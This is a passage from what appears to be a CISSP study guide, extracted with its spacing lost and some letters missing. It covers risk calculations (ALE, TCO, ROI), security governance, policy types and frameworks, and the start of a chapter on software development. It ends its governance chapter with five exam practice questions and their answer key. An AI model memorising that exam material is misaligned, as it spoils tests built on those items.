reectsthepricewhichcomparableassetshavebeenpurchasedin
transactionsundersimilarcircumstances.
IncomeApproach:Thisapproachisbasedonthepremisethatthevalueofa
securityorassetisthepresentvalueofthefutureearningcapacitythatan
assetwillgenerateoveritsremainingusefullife.
CostApproach:Thisapproachestimatesthefairvalueoftheassetby
referencetothecoststhatwouldbeincurredinordertorecreateorreplace
theasset.

Exposure Factor

TheExposureFactor(EF)isthepercentageofvalueanassetlostduetoan
incident.InthecaseofastolenlaptopwithunencryptedPII,theExposure
Factoris100%:thelaptopandallthedataaregone.
Single Loss Expectancy

TheSingleLossExpectancy(SLE)isthecostofasingleloss.SLEistheAsset
Value(AV)timestheExposureFactor(EF).Inourcase,SLEis$25,000(Asset
Value)times100%(ExposureFactor)or$25,000.
Annual Rate of Occurrence

TheAnnualRateofOccurrence(ARO)isthenumberoflossesyousuerper

year.Lookingthroughpastevents,youdiscoverthatyouhavesuered11
lostorstolenlaptopsperyearonaverage.YourAROis11.
Annualized Loss Expectancy

TheAnnualizedLossExpectancy(ALE)isyouryearlycostduetoarisk.Itis
calculatedbymultiplyingtheSingleLossExpectancy(SLE)timestheAnnual
RateofOccurrence(ARO).Inourcase,itis$25,000(SLE)times11(ARO)or
$275,000.
Table3.2summarizestheequationsusedtodetermineAnnualizedLoss
Expectancy.
Table3.2
SummaryofRiskEquations

Total Cost of Ownership

TheTotalCostofOwnership(TCO)isthetotalcostofamitigatingsafeguard.
TCOcombinesupfrontcosts(oftenaonetimecapitalexpense)plusannual
costofmaintenance,includingstahours,vendormaintenancefees,software
subscriptions,etc.Theseongoingcostsareusuallyconsideredoperational
expenses.
Usingourlaptopencryptionexample,theupfrontcostoflaptopencryption
softwareis$100/laptop,or$100,000for1000laptops.Thevendorchargesa
10%annualsupportfeeor$10,000/year.Youestimatethatitwilltake4sta
hoursperlaptoptoinstallthesoftwareor4000stahours.Thestathatwill
performthisworkmakes$50/hourplusbenets.Includingbenets,thesta
costperhouris$70times4000hours,thatis,$280,000.
Yourcompanyusesa3yeartechnologyrefreshcycle,soyoucalculatethe

TotalCostofOwnershipover3years:
Softwarecost:$100,000
Threeyearsvendorsupport:$10,0003=$30,000
Hourlystacost:$280,000
TotalCostofOwnershipover3years:$410,000
TotalCostofOwnershipperyear:$410,000/3=$136,667/year
YourAnnualTotalCostofOwnershipforthelaptopencryptionprojectis
$136,667peryear.
Return on Investment

TheReturnonInvestment(ROI)istheamountofmoneysavedby
implementingasafeguard.IfyourannualTotalCostofOwnership(TCO)is
lessthanyourAnnualizedLossExpectancy(ALE),youhaveapositiveROI
(andhavemadeagoodchoice).IftheTCOishigherthanyourALE,youhave
madeapoorchoice.
TheannualTCOoflaptopencryptionis$136,667;theAnnualizedLoss
Expectancyforlostorstolenunencryptedlaptopsis$275,000.Themathis
summarizedinTable3.3.
Table3.3
AnnualizedLossExpectancyofUnencryptedLaptops

ImplementinglaptopencryptionwillchangetheExposureFactor.Thelaptop
hardwareisworth$2500,andtheexposedPIIcostsanadditional$22,500for

$25,000AssetValue.Ifanunencryptedlaptopislostorstolen,theExposure
Factoris100%(thehardwareandalldataisexposed).Laptopencryption
mitigatesthePIIexposurerisk,loweringtheExposureFactorfrom100%(the
laptopandalldata)to10%(justthelaptophardware).
ThelowerExposureFactorlowerstheAnnualizedLossExpectancyfrom
$275,000to$27,500asshowninTable3.4.
Table3.4
AnnualizedLossExpectancyofEncryptedLaptops

Youwillsave$247,500/year(theoldALE,$275,000,minusthenewALE,
$27,500)bymakinganinvestmentof$136,667.YourROIis$110,833peryear
($247,500minus$136,667).ThelaptopencryptionprojecthasapositiveROI
andisawiseinvestment.
Budget and metrics

WhencombinedwithRiskAnalysis,theTotalCostofOwnershipandReturn
onInvestmentcalculationsfactorintoproperbudgeting.Someorganizations
havetheenviablepositionofampleinformationsecurityfunding,yettheyare
oftencompromised.Why?Theanswerisusuallybecausetheymitigatedthe
wrongrisks.Theyspentmoneywhereitmaynothavebeennecessaryand
ignoredlargerrisks.Regardlessofstasizeorbudget,allorganizationscan
takeonaniteamountofinformationsecurityprojects.Iftheychoose
unwisely,informationsecuritycansuer.
Metricscangreatlyassisttheinformationsecuritybudgetingprocess.They
helpillustratepotentiallycostlyrisksanddemonstratetheeectiveness(and
potentialcostsavings)ofexistingcontrols.Theycanalsohelpchampionthe
causeofinformationsecurity.
Risk choices

Risk choices

Oncewehaveassessedrisk,wemustdecidewhattodo.Optionsinclude
acceptingtherisk,mitigatingoreliminatingtherisk,transferringtherisk,and
avoidingtherisk.
Accept the risk

Somerisksmaybeaccepted:insomecases,itischeapertoleaveanasset
unprotectedduetoaspecicrisk,ratherthanmaketheeort(andspendthe
money)requiredtoprotectit.Thiscannotbeanignorantdecision:therisk
mustbeconsidered,andalloptionsmustbeconsideredbeforeacceptingthe
risk.
Risk acceptance criteria

Lowlikelihood/lowconsequencerisksarecandidatesforriskacceptance.
Highandextremeriskscannotbeaccepted.Therearecases,suchasdata
protectedbylawsorregulationsorrisktohumanlifeorsafety,where
acceptingtheriskisnotanoption.
Mitigate the risk

Mitigatingtheriskmeansloweringtherisktoanacceptablelevel.Thelaptop
encryptionexamplegiveninSectionAnnualizedLossExpectancyisan
exampleofmitigatingtherisk.TheriskoflostPIIduetostolenlaptopswas
mitigatedbyencryptingthedataonthelaptops.Theriskhasnotbeen
eliminatedentirely:aweakorexposedencryptionpasswordcouldexposethe
PII,buttheriskhasbeenreducedtoanacceptablelevel.
Insomecases,itispossibletoremovetheriskentirely:thisiscalled
eliminatingtherisk.
Transfer the risk

Transfertheriskistheinsurancemodel.Mostpeopledonotassumethe
riskofretotheirhouse:theypayaninsurancecompanytoassumethatrisk
forthem.TheinsurancecompaniesareexpertsinRiskAnalysis:buyingrisk
istheirbusiness.
Risk avoidance

AthoroughRiskAnalysisshouldbecompletedbeforetakingonanew
project.IftheRiskAnalysisdiscovershighorextremerisksthatcannotbe
easilymitigated,avoidingtherisk(andtheproject)maybethebestoption.
Qualitative and Quantitative Risk Analysis

Qualitative and Quantitative Risk Analysis

QuantitativeandQualitativeRiskAnalysesaretwomethodsforanalyzing
risk.QuantitativeRiskAnalysisuseshardmetrics,suchasdollars.Qualitative
RiskAnalysisusessimpleapproximatevalues.Quantitativeismoreobjective;
qualitativeismoresubjective.HybridRiskAnalysiscombinesthetwo:using
quantitativeanalysisforrisksthatmaybeeasilyexpressedinhardnumbers,
suchasmoney,andqualitativefortheremainder.
CalculatingtheAnnualizedLossExpectancy(ALE)isanexampleof
QuantitativeRiskAnalysis.TheRiskAnalysisMatrix(shownpreviouslyin
Table3.1)isanexampleofQualitativeRiskAnalysis.
The Risk Management process

TheU.S.NationalInstituteofStandardsandTechnology(NIST)published
SpecialPublication80030,RiskManagementGuideforInformation
TechnologySystems(seeh p://csrc.nist.gov/publications/nistpubs/800
30/sp80030.pdf).Theguidedescribesa9stepRiskAnalysisprocess:
1.SystemCharacterization
2.ThreatIdentication
3.VulnerabilityIdentication
4.ControlAnalysis
5.LikelihoodDetermination
6.ImpactAnalysis
7.RiskDetermination
8.ControlRecommendations
9.ResultsDocumentation

INFORMATION SECURITY GOVERNANCE

InformationSecurityGovernanceisinformationsecurityattheorganizational
level:seniormanagement,policies,processes,andstang.Itisalsothe

organizationalpriorityprovidedbyseniorleadership,whichisrequiredfora
successfulinformationsecurityprogram.
Security policy and related documents

Documentssuchaspoliciesandproceduresarearequiredpartofany
successfulinformationsecurityprogram.Thesedocumentsshouldbe
groundedinreality:theyarenotidealisticdocumentsthatsitonshelves
collectingdust.Theyshouldmirrortherealworldandprovideguidanceon
thecorrect(andsometimesrequired)wayofdoingthings.
Policy

Policiesarehighlevelmanagementdirectives.Policyismandatory:ifyoudo
notagreewithyourcompanyssexualharassmentpolicy,forexample,you
donothavetheoptionofnotfollowingit.

CrunchTime
Policyishighlevel:itdoesnotdelveintospecics.Aserversecurity
policywoulddiscussprotectingthecondentiality,integrity,and
availabilityofthesystem(usuallyinthoseterms).Itmaydiscusssoftware
updatesandpatching.ThepolicywouldnotusetermslikeLinuxor
Windows;thatistoolowlevel.Infact,ifyouconvertedyourservers
fromWindowstoLinux,yourserverpolicywouldnotchange.Other
documents,likeprocedures,wouldchange.

Components of program policy

Allpolicyshouldcontainthesebasiccomponents:
Purpose
Scope
Responsibilities
Compliance

Purposedescribestheneedforthepolicy,typicallytoprotectthe
condentiality,integrity,andavailabilityofprotecteddata.
Scopedescribeswhatsystems,people,facilities,andorganizationsare
coveredbythepolicy.Anyrelatedentitiesthatarenotinscopeshouldbe
documentedtoavoidconfusion.
Responsibilitiesincluderesponsibilitiesofinformationsecuritysta,policy
andmanagementteams,aswellasresponsibilitiesofallmembersofthe
organization.
Compliancedescribestworelatedissues:howtojudgetheeectivenessofthe
policies(howwelltheyareworking)andwhathappenswhenpolicyis
violated(thesanction).Allpolicymusthaveteeth:apolicythatforbids
accessingexplicitcontentviatheInternetisnotusefulifthereareno
consequencesfordoingso.
Policy types

NISTSpecialPublication80012(see
h p://csrc.nist.gov/publications/nistpubs/80012/80012html/chapter5.html)
discussesthreespecicpolicytypes:programpolicy,issuespecicpolicy,
andsystemspecicpolicy.
Programpolicyestablishesanorganizationsinformationsecurityprogram.
ExamplesofissuespecicpolicieslistedinNISTSP80012includeemail
policyandemailprivacypolicy.Examplesofsystemspecicpoliciesinclude
aleserverpolicyoraWebserverpolicy.
Procedures

Aprocedureisastepbystepguideforaccomplishingatask.Theyarelow
levelandspecic.Likepolicies,proceduresaremandatory.
Hereisasimpleexampleprocedureforcreatinganewuser:
1.Receiveanewuserrequestformandverifyitscompleteness.
2.Verifythattheusersmanagerhassignedtheform.
3.Verifythattheuserhasreadandagreedtotheuseraccountsecuritypolicy.

4.ClassifytheusersrolebyfollowingroleassignmentprocedureNX103.
5.Verifythattheuserhasselectedasecretword,suchastheirmothers
maidenname,andenteritintothehelpdeskaccountprole.
6.Createtheaccountandassigntheproperrole.
7.AssignthesecretwordastheinitialpasswordandsetForceuserto
changepasswordonnextlogintoTrue.
8.EmailtheNewAccountdocumenttotheuserandtheirmanager.
Thestepsofthisprocedurearemandatory.Securityadministratorsdonot
havetheoptionofskippingstep1,forexample,createanaccountwithouta
form.

D i d Yo u K n o w ?
Othersafeguardsdependonthisfact:whenausercallsthehelpdeskasa
resultofaforgo enpassword,thehelpdeskwillfollowtheirforgo en
passwordprocedure,whichincludesaskingfortheuserssecretword.
Theycannotdothatunlessstep5wascompleted:withoutthatword,the
helpdeskcannotsecurelyresetthepassword.Thismitigatessocial
engineeringa acks,whereanimpostertriestotrickthehelpdeskto
rese ingapasswordforanaccounttheyarenotauthorizedtoaccess.

Standards

Astandarddescribesthespecicuseoftechnology,oftenappliedto
hardwareandsoftware.AllemployeeswillreceiveanACMENexus6laptop
with4gigabytesofmemory,a2.8GHZdualcoreCPU,and2Terabytedisk
isanexampleofahardwarestandard.ThelaptopswillrunWindows8
Enterprise,64bitversionisanexampleofasoftware(operatingsystem)
standard.
Standardsaremandatory.TheylowertheTotalCostofOwnershipofa
safeguard.
Guidelines

Guidelines

Guidelinesarerecommendations(whicharediscretionary).Aguidelinecan
beausefulpieceofadvice,suchasTocreateastrongpassword,taketherst
le erofeverywordinasentence,andmixinsomenumbersandsymbols.I
willpasstheCISSPexamin6months!becomesIwptcei6m!.
Youcancreateastrongpasswordwithoutfollowingthisadvice,whichis
whyguidelinesarenotmandatory.Theyareuseful,especiallyfornovice
users.
Baselines

Baselinesareuniformwaysofimplementingasafeguard.Hardenthe
systembyapplyingtheCenterforInternetSecurityLinuxbenchmarksisan
exampleofabaseline(seeh p://benchmarks.cisecurity.orgfortheCIS
SecurityBenchmarks;theyareagreatresource).Thesystemmustmeetthe
baselinedescribedbythosebenchmarks.
Baselinesarediscretionary:itisacceptabletohardenthesystemwithout
followingtheaforementionedbenchmarks,aslongasitisatleastassecureas
asystemhardenedusingthebenchmarks.
Table3.5summarizesthetypesofsecuritydocumentation.
Table3.5
SummaryofSecurityDocumentation

Roles and responsibilities

Primaryinformationsecurityrolesincludeseniormanagement,dataowner,

custodian,anduser.Eachplaysadierentroleinsecuringanorganizations
assets.
Seniormanagementcreatestheinformationsecurityprogramandensures
thatitisproperlystaedandfundedandhasorganizationalpriority.Itis
responsibleforensuringthatallorganizationalassetsareprotected.
Thedataowner(alsocalledinformationownerorbusinessowner)isa
managementemployeeresponsibleforensuringthatspecicdatais
protected.Dataownersdeterminedatasensitivitylabelsandthefrequencyof
databackup.Acompanywithmultiplelinesofbusinessmayhavemultiple
dataowners.Thedataownerperformsmanagementduties;custodians
performthehandsonprotectionofdata.
Acustodianprovideshandsonprotectionofassetssuchasdata.They
performdatabackupsandrestoration,patchsystems,congureantivirus
software,etc.Thecustodiansfollowdetailedorders;theydonotmakecritical
decisionsonhowdataisprotected.ThedataownermaydictateAlldata
mustbebackedupevery24hours.Thecustodians(andtheirmanagers)
wouldthendeployandoperateabackupsolutionthatmeetsthedataowners
requirements.
Theuseristhefourthprimaryinformationsecurityrole.Usersmustfollow
therules:theymustcomplywithmandatorypoliciesprocedures,standards,
etc.Theymustnotwritetheirpasswordsdownorshareaccounts,for
example.Usersmustbemadeawareoftheserisksandrequirements.You
cannotassumetheywillknowwhattodoorassumetheyarealreadydoing
therightthing:theymustbetold,viainformationsecurityawareness.
Personnel security

Userscanposethebiggestsecurityrisktoanorganization.Background
checksshouldbeperformed,contractorsneedtobesecurelymanaged,and
usersmustbeproperlytrainedandmadeawareofsecurityrisks,aswewill
discussnext.ControlssuchasNondisclosureAgreements(NDA)andrelated
employmentagreementsarearecommendedpersonnelsecuritycontrol.
Background checks

Organizationsshouldconductathoroughbackgroundcheckbeforehiring
anyone.Acriminalrecordscheckshouldbeconducted,andallexperience,

education,andcerticationsshouldbeveried.Lyingorexaggeratingabout
education,certications,andrelatedcredentialsisoneofthemostcommon
examplesofdishonestyinregardstothehiringprocess.
Morethoroughbackgroundchecksshouldbeconductedforroleswith
heightenedprivileges,suchasaccesstomoneyorclassiedinformation.
Thesecheckscanincludeanancialinvestigation,amorethoroughcriminal
recordscheck,andinterviewswithfriends,neighbors,andcurrentand
formercoworkers.
Employee termination

Terminationshouldresultinimmediaterevocationofallemployeeaccess.
Beyondaccountrevocation,terminationshouldbeafairprocess.Thereare
ethicalandlegalreasonsforemployingfairtermination,butthereisalsoan
additionalinformationsecurityadvantage.Anorganizationsworstenemy
canbeadisgruntledformeremployee,who,evenwithoutlegitimateaccount
access,knowswheretheweakspotsare.
Security awareness and training

Securityawarenessandtrainingareoftenconfused.Awarenesschangesuser
behavior;trainingprovidesaskillset.
Remindinguserstonevershareaccountsorwritetheirpasswordsdownisan
exampleofawareness.Itisassumedthatsomeusersaredoingthewrong
thing,andawarenessisdesignedtochangethatbehavior.
Securitytrainingteachesauserhowtodosomething.Examplesinclude
trainingnewhelpdeskpersonneltoopen,modify,andcloseservicetickets;
trainingnetworkengineerstocongurearouter;ortrainingasecurity
administratortocreateanewaccount.
Vendor, consultant, and contractor security

Vendors,consultants,andcontractorscanintroduceriskstoanorganization.
Theyarenotdirectemployeesandsometimeshaveaccesstosystemsat
multipleorganizations.Ifallowedto,theymayplaceanorganizations
sensitivedataondevicesnotcontrolled(orsecured)bytheorganization.
Thirdpartypersonnelwithaccesstosensitivedatamustbetrainedandmade
awareofrisks,justasemployeesare.Backgroundchecksmayalsobe

required,dependingonthelevelofaccessrequired.Informationsecurity
policies,procedures,andotherguidanceshouldapplyaswell.Additional
policiesregardingownershipofdataandintellectualpropertyshouldbe
developed.Clearrulesdictatingwhereandwhenathirdpartymayaccessor
storedatamustbedeveloped.
Outsourcing and o shoring

Outsourcingistheuseofathirdpartytoprovideinformationtechnology
supportservicesthatwerepreviouslyperformedinhouse.Oshoringis
outsourcingtoanothercountry.
BothcanlowerTotalCostofOwnershipbyprovidingITservicesatlower
cost.Theymayalsoenhancetheinformationtechnologyresourcesandskill
setandresourcesavailabletoacompany(especiallyasmallcompany),which
canimprovecondentiality,integrity,andavailabilityofdata.
AthoroughandaccurateRiskAnalysismustbeperformedbefore
outsourcingoroshoringsensitivedata.Ifthedatawillresideinanother
country,youmustensurethatlawsandregulationsgoverningthedataare
followed,evenbeyondtheirjurisdiction.
Privacy

Privacyistheprotectionofthecondentialityofpersonalinformation.Many
organizationshostpersonalinformationabouttheirusers:PIIsuchassocial
securitynumbers,nancialinformationsuchasannualsalaryandbank
accountinformationrequiredforpayrolldeposits,andhealthcare
informationforinsurancepurposes.Thecondentialityofthisinformation
mustbeassured.
Due care and due diligence

Duecareisdoingwhatareasonablepersonwoulddo.Itissometimescalled
theprudentmanrule.Thetermderivesfromdutyofcare:parentshavea
dutytocarefortheirchildren,forexample.Duediligenceisthemanagement
ofduecare.
Duecareandduediligenceareoftenconfused:theyarerelated,butdierent.
Duecareisinformal;duediligencefollowsaprocess.Thinkofduediligence
asastepbeyondduecare.Expectingyourstatokeeptheirsystemspatched

meansyouexpectthemtoexerciseduecare.Verifyingthatyourstahas
patchedtheirsystemsisanexampleofduediligence.
Gross negligence

Grossnegligenceistheoppositeofduecare.Itisalegallyimportantconcept.
IfyousuerlossofPII,butcandemonstrateduecareinprotectingthePII,
youareonlegallystrongerground,forexample.Ifyoucannotdemonstrate
duecare(youweregrosslynegligent),youareinamuchworselegal
position.
Best practice

Informationsecuritybestpracticeisaconsensusofthebestwaytoprotectthe
condentiality,integrity,andavailabilityofassets.Followingbestpracticesis
awaytodemonstrateduecareandduediligence.
Auditing and control frameworks

Auditingmeansverifyingcompliancetoasecuritycontrolframework,
publishedspecication,orinternalpolicies,standards,etc.Auditinghelps
supportRiskAnalysiseortsbyverifyingthatacompanynotonlytalksthe
talk(hasdocumentationsupportingarobustinformationsecurityprogram)
butalsowalksthewalk(actuallyhasarobustinformationsecurityprogram
inpractice).
AnumberofcontrolframeworksareavailabletoassistauditingRisk
Analysis.Some,suchasPCIDSS,areindustryspecic.Others,suchas
OCTAVE,ISO17799/27002,andCOBIT,coverednext,aremoregeneral.
OCTAVE

OCTAVEstandsforOperationallyCriticalThreat,Asset,andVulnerability
Evaluation,aRiskManagementframeworkfromCarnegieMellonUniversity.
OCTAVEdescribesathreephaseprocessformanagingrisk.Phase1identies
staknowledge,assets,andthreats.Phase2identiesvulnerabilitiesand
evaluatessafeguards.Phase3conductstheRiskAnalysisanddevelopsthe
riskmitigationstrategy.
OCTAVEisahighqualityfreeresourcethatmaybedownloadedfrom
h p://www.cert.org/octave/.
ISO 17799 and the ISO 27000 series

ISO17799wasabroadbasedapproachforinformationsecuritycodeof
practicebytheInternationalOrganizationforStandardization(basedin
Geneva,Swi erland).ThefulltitleisISO/IEC17799:2005Information
technologySecurityTechniquesCodeofPracticeforInformationSecurity
Management.ISO17799:2005signiesthe2005versionofthestandard.It
wasbasedonBS(BritishStandard)7799Part1.

FastFacts
ISO17799had11areas,focusingonspecicinformationsecuritycontrols:
1.Policy
2.Organizationofinformationsecurity
3.Assetmanagement
4.Humanresourcessecurity
5.Physicalandenvironmentalsecurity
6.Communicationsandoperationsmanagement
7.Accesscontrol
8.Informationsystemsacquisition,development,andmaintenance
9.Informationsecurityincidentmanagement
10.Businesscontinuitymanagement
11.Compliance
2

ISO/IEC17799:2005.h p://www.iso.org/iso/catalogue_detail?

csnumber=39612[accessedJune26,2013].

ISO17799wasrenumberedtoISO27002in2005tomakeitconsistentwiththe

27000seriesofISOsecuritystandards.ISO27001isarelatedstandard,
formallycalledISO/IEC27001:2005InformationtechnologySecurity
techniquesInformationSecurityManagementSystemsRequirements.
ISO27001wasbasedonBS7799Part2.
NotethatthetitleofISO27002includesthewordtechniques;ISO27001
includesthewordrequirements.Simplyput,ISO27002describes
informationsecuritybestpractices(Techniques),andISO27001describesa
processforauditing(Requirements).
COBIT

COBIT(ControlObjectivesforInformationandrelatedTechnology)isa
controlframeworkforemployinginformationsecuritygovernancebest
practiceswithinanorganization.COBITwasdevelopedbyISACA
(InformationSystemsAuditandControlAssociation,see
h p://www.isaca.org).
ITIL

ITIL(InformationTechnologyInfrastructureLibrary)isaframeworkfor
providingbestservicesinITServiceManagement(ITSM).Moreinformation
aboutITILisavailableath p://www.itilocialsite.com.
ITILcontainsveServiceManagementPracticesCoreGuidance
publications:
ServiceStrategy
ServiceDesign
ServiceTransition
ServiceOperation
ContinualServiceImprovement
ServiceStrategyhelpsITprovideservices.ServiceDesigndetailsthe
infrastructureandarchitecturerequiredtodeliverITservices.Service
Transitiondescribestakingnewprojectsandmakingthemoperational.
ServiceOperationcoversIToperationscontrols.Finally,ContinualService
ImprovementdescribeswaystoimproveexistingITservices.
Certification and Accreditation

Certification and Accreditation

Certicationisadetailedinspectionthatverieswhetherasystemmeetsthe
documentedsecurityrequirements.Accreditationisthedataowners
acceptanceoftheriskrepresentedbythatsystem.Thisprocessiscalled
CerticationandAccreditationorC&A.
NISTSpecialPublication80037GuidefortheSecurityCerticationand
AccreditationofFederalInformationSystems(see
h p://csrc.nist.gov/publications/nistpubs/80037rev1/sp80037rev1nal.pdf)
describesU.S.FederalCerticationandAccreditation.
Certicationmaybeperformedbyatrustedthirdpartysuchasanauditor.
Certiersinvestigateasystem,inspectdocumentation,andmayobserve
operations.Theyauditthesystemtoensurecompliance.Certicationisonly
arecommendation:thecertierdoesnothavetheabilitytoapproveasystem
orenvironment.Onlythedataowner(theaccreditor)candoso.
NISTSP80037describesafourstepCerticationandAccreditationprocess:
Initiationphase
Securitycerticationphase
Securityaccreditationphase
Continuousmonitoringphase
Theinformationsecuritysystemandriskmitigationplanareresearched
duringtheinitiationphase.Thesecurityofthesystemisassessedand
documentedduringthesecuritycerticationphase.Thedecisiontoacceptthe
riskrepresentedbythesystemismadeanddocumentedduringthesecurity
accreditationphase.Finally,onceaccredited,theongoingsecurityofthe
systemisveriedduringthecontinuousmonitoringphase.

Summary of exam objectives

Informationsecuritygovernanceassuresthatanorganizationhasthecorrect
informationstructure,leadership,andguidance.Governancehelpsassure
thatacompanyhastheproperadministrativecontrolstomitigaterisk.Risk
Analysis(RA)helpsensurethatanorganizationproperlyidenties,analyzes,

andmitigatesrisk.Accuratelyassessingriskandunderstandingtermssuchas
AnnualizedLossExpectancy,TotalCostofOwnership,andReturnon
Investmentwillnotonlyhelpyouintheexambutalsohelpadvanceyour
informationsecuritycareer.

TOP FIVE TOUGHEST QUESTIONS

1.Whichofthefollowingwouldbeanexampleofapolicystatement?
A.ProtectPIIbyhardeningservers
B.HardenWindows7byrstinstallingtheprehardenedOSimage
C.Youmaycreateastrongpasswordbychoosingtherstle erofeachword
inasentenceandmixinginnumbersandsymbols
D.DownloadtheCISecurityWindowsbenchmarkandapplyit
Usethefollowingscenariotoanswerquestions24:
YourcompanysellsAppleiPodsonlineandhassueredmanyDenialof
Service(DoS)a acks.Yourcompanymakesanaverage$20,000protper
week,andatypicalDoSa acklowerssalesby40%.YousuersevenDoS
a acksonaverageperyear.ADoSmitigationserviceisavailablefora
subscriptionfeeof$10,000permonth.Youhavetestedthisserviceand
believeitwillmitigatethea acks.
2.WhatistheAnnualRateofOccurrenceintheabovescenario?
A.$20,000
B.40%
C.7
D.$10,000
3.WhatistheAnnualizedLossExpectancy(ALE)oflostiPodsalesduetothe
DoSa acks?
A.$20,000

B.$8000
C.$84,000
D.$56,000
4.IstheDoSmitigationserviceagoodinvestment?
A.Yes,itwillpayforitself
B.Yes,$10,000islessthanthe$56,000AnnualizedLossExpectancy
C.No,theannualTotalCostofOwnershipishigherthantheAnnualized
LossExpectancy
D.No,theannualTotalCostofOwnershipislowerthantheAnnualizedLoss
Expectancy
5.Whichofthefollowingdescribesadutyofthedataowner?
A.Patchsystems
B.Reportsuspiciousactivity
C.Ensuretheirlesarebackedup
D.Ensuredatahaspropersecuritylabels

ANSWERS
1.Correctanswerandexplanation:A.AnswerAiscorrect;policyishighlevel
andavoidstechnologyspecics.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.Bisaproceduralstatement.Cisaguideline.Disabaseline.
2.Correctanswerandexplanation:C.AnswerCiscorrect;theAnnualRateof
Occurrenceisthenumberofa acksinayear.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.$20,000istheAssetValue(AV).FortypercentistheExposureFactor
(EF).$10,000isthemonthlycostoftheDoSservice(usedtocalculateTCO).

3.Correctanswerandexplanation:D.AnswerDiscorrect;AnnualizedLoss
Expectancy(ALE)iscalculatedbyrstcalculatingtheSingleLossExpectancy
(SLE),whichistheAssetValue(AV,$20,000)timestheExposureFactor(EF,
40%).TheSLEis$8000;multiplybytheAnnualRateofOccurrence(ARO,7)
foranALEof$56,000.
Incorrectanswersandexplanations:A,B,andC.AnswersA,B,andCare
incorrect.$20,000istheAssetValue.$8000istheSingleLossExpectancy.
4.Correctanswerandexplanation:C.AnswerCiscorrect;theTotalCostof
Ownership(TCO)oftheDoSmitigationserviceishigherthanAnnualized
LossExpectancy(ALE)oflostsalesduetoDoSa acks.Thismeansitsless
expensivetoaccepttheriskofDoSa acks(orndalessexpensivemitigation
strategy).
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.Aisincorrect:theTCOishigher,notlower.$10,000isthemonthly
TCO;youmustcalculateyearlyTCOtocomparewiththeALE.Diswrong:
theannualTCOishigher,notlower.
5.Correctanswerandexplanation:D.AnswerDiscorrect;thedataowner
ensuresthatdatahaspropersecuritylabels.
Incorrectanswersandexplanations:A,B,andC.AnswersA,B,andCare
incorrect.Custodianspatchsystems.Usersshouldbeawareandreport
suspiciousactivity.Ensuringlesarebackedupisaweakeranswerforadata
ownerduty,usedtoconfusethedataownerwiththeowneroftheleona
discretionaryaccesscontrolsystem.
1

IntangibleAssetsRecognisingTheirValue.

h p://www.deloi e.com/assets/Dcom
Ireland/Local%20Assets/Documents/ie_CF_ValuationsIntangible_0609.pdf
[accessedJune26,2013].

CHAPTER4

Domain 4: So ware Development

Security
Abstract
ThischapterintroducesDomain4oftheCISSP,SoftwareDevelopment
Security.Themostimportantaspectsofthisdomainarerelatedtomanaging
thedevelopmentofsoftwareandapplications.Approachestosoftware
developmentthata empttoreducethelikelihoodofdefectsorawsarea
keytopicinthisdomain.Inparticular,theWaterfall,Spiral,andRapid
ApplicationDevelopment(RAD)modelsofthesoftwaredevelopmentare
considered.Anothersignicantportionofthischapterisdedicatedto
understandingtheprinciplesofObjectOrientedProgrammingandDesign.A
basicdiscussionofseveraltypesofsoftwarevulnerabilitiesandtheissues
surroundingdisclosureofthevulnerabilitiesarealsoatopicforthisdomain.
Finally,databases,beingakeycomponentofmanyapplications,are
considered.

KEYWORDS
Database;ExtremeProgramming(XP);Object;ObjectOrientedProgramming;
Procedurallanguages;SpiralModel;SystemsDevelopmentLifeCycle;
WaterfallModel

Exam Objectives in This Chapter

ProgrammingConcepts
ApplicationDevelopmentMethods
ObjectOrientedDesignandProgramming

SoftwareVulnerabilities,Testing,andAssurance
Databases

Introduction
Softwareiseverywhere:notonlyinourcomputersbutalsoinourhouses,our
cars,andourmedicaldevices,andallsoftwareprogrammersmakemistakes.
Assoftwarehasgrownincomplexity,thenumberofmistakeshasgrown
alongwithit.
Developingsoftwarethatisrobustandsecureiscritical:thischapterwill
showhowtodothat.Wewillcoverprogrammingfundamentalssuchas
compiledversusinterpretedlanguages,aswellasproceduralandObject
OrientedProgramminglanguages.Wewilldiscussapplicationdevelopment
modelssuchastheWaterfallModel,SpiralModel,andExtremeProgramming
(XP)andothers.Wewilldescribecommonsoftwarevulnerabilities,waysto
testforthem,andmaturityframeworkstoassessthematurityofthe
programmingprocessandprovidewaystoimproveit.

PROGRAMMING CONCEPTS
Letusbeginbyunderstandingsomecornerstoneprogrammingconcepts.As
computershavebecomemorepowerfulandubiquitous,theprocessand
methodsusedtocreatecomputersoftwarehavegrownandchanged.
Machine code, source code, and assemblers

Machinecode(alsocalledmachinelanguage)isasoftwarethatisexecuted
directlybytheCPU.MachinecodeisCPUdependent;itisaseriesof1sand
0sthattranslatetoinstructionsthatareunderstoodbytheCPU.Sourcecodeis
computerprogramminglanguageinstructionsthatarewri enintextthat
mustbetranslatedintomachinecodebeforeexecutionbytheCPU.
Assemblylanguageisalowlevelcomputerprogramminglanguage.Assembly
languageinstructionsareshortmnemonics,suchasADD,SUB,
(subtract),andJMP(jump),thatmatchtomachinelanguageinstructions.
Anassemblerconvertsassemblylanguageintomachinelanguage.A
disassemblera emptstoconvertmachinelanguageintoassembly.
Compilers, interpreters, and bytecode

Compilerstakesourcecode,suchasCorBasic,andcompileitintomachine
code.Interpretedlanguagesdierfromcompiledlanguages:interpretedcodeis
compiledontheyeachtimetheprogramisrun.Bytecode,suchasJava
bytecode,isalsointerpretedcode.Bytecodeexistsasanintermediaryform
(convertedfromsourcecode)butstillmustbeconvertedintomachinecode
beforeitmayrunontheCPU.
Types of publicly released so ware

Onceprogrammed,publiclyreleasedsoftwaremaycomeindierentforms
(suchaswithorwithouttheaccompanyingsourcecode)andreleasedundera
varietyoflicenses.
Open and closed source so ware

Closedsourcesoftwareissoftwaretypicallyreleasedinexecutableform:the
sourcecodeiskeptcondential.Opensourcesoftwarepublishessourcecode
publicly.Proprietarysoftwareissoftwarethatissubjecttointellectual
propertyprotectionssuchaspatentsorcopyrights.
Free So ware, Shareware, and Crippleware

Freewareisasoftware,whichisfreeofchargetouse.Sharewareisafully
functionalproprietarysoftwarethatmaybeinitiallyusedfreeofcharge.Ifthe
usercontinuestousetheSharewareforaspecicperiodoftimespeciedby
thelicense(suchas30days),theSharewarelicensetypicallyrequires
payment.Cripplewareisapartiallyfunctioningproprietarysoftware,often
withkeyfeaturesdisabled.Theuseristypicallyrequiredtomakeapayment
tounlockthefullfunctionality.

